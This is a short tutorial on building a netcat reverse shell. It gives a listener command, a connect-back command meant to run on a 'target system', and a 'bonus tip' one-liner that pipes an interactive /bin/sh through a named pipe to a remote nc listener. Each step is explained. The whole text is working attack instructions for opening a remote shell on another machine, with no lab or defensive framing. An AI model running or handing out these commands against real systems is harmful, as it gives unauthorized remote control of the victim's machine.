1. Establish a listening connection on your machine
nc -l -p <your_port>
This command starts netcat in listening mode (-l) on the given port (-p <your_port>). Your machine then waits to accept an incoming connection on that port.
2. Instruct the target system to connect back to you:
nc <your_ip> <your_port>
This command is intended to be executed on the target system. It tells the target to initiate a TCP connection back to your machine's IP address (<your_ip>) on the specified port (<your_port>). Because the target initiates the outbound connection rather than accepting an inbound one, this is the reverse-shell pattern: the target connects back to your listening netcat instance. Note that plain nc only relays its own standard input and output across that connection; the named-pipe variant below is what actually wires a shell into it.
Bonus Tip: Alternative using a named pipe and shell:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <your_ip> <your_port> >/tmp/f
This command does the following:
- Removes any existing file named /tmp/f.
- Creates a named pipe (mkfifo /tmp/f), which is a special type of file used for inter-process communication.
- Reads from the named pipe (cat /tmp/f) and pipes it to /bin/sh -i 2>&1. This starts an interactive shell that takes its commands from the pipe and merges its error output into its standard output (2>&1).
- Sends the output of the shell to your machine using nc <your_ip> <your_port>.
- Writes whatever nc receives from your machine back into the named pipe (>/tmp/f), where cat feeds it to the shell as input, closing the loop.
This alternative command achieves the same result as the previous example but uses a named pipe to loop data between the shell and netcat, which is why the whole thing fits in a single line and needs no special netcat build options.